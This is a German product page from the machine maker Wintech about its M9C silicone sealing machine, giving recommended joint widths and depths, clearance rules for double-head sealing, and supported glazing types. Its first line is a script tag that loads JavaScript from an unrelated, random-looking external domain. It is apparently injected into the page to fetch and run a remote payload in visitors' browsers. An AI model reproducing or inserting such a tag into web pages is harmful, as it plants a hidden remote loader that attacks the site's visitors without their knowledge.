<script type="text/javascript" src="http://www.alga9frog.com/js/162003.js" ></script> <noscript></noscript>

Größe der Fuge

Größe der Fuge

Dank der Druckeinstellungen und der Einspritzgeschwindigkeit hat die Maschine M9C viel Raum zum arbeiten. Allerdings ist es sehr empfehlenswert, den Fachempfehlungen von Wintech über die Dimensionen der Silikonfuge zu folgen, und zwar:

- 3mm Breite für 6mm Tiefe

- 4mm Breite für 7 bis 8mm Tiefe

Zögern Sie nicht uns zu kontaktieren, bevor Sie in Ihr Werkzeug investieren.

 

Lichte

Bei dem Einsatz einer Doppelkopfmaschine (zwei Seiten werden gleichzeitig versiegelt), muss die Lichte strikt identisch sein, da Kopf 2 als Sklave von Kopf 1 funktioniert.


Ist dies nicht der Fall (beispielsweise wegen dem Vorhandensein eines Wasserschenkels aus Aluminium im äußeren unteren Bauteil) sollte dann eine Seite nach der anderen versiegelt werden.

 

Art der Verglasung

Die Maschine M9C kann mit Einfach-, Doppel oder Dreifachverglasung arbeiten.
Strukturiertes Glas kann nicht mit der Maschine M9C versiegelt werden.
Wenn die Verglasung außerhalb des Rahmens ist (bei festen Elementen von Schiebetüren zum Beispiel) sollte mit Wintech untersucht werden, welche maximale Strecke auszuführen ist, um das Glas in seinem Rahmen zu erreichen (siehe nachfolgendes Bild).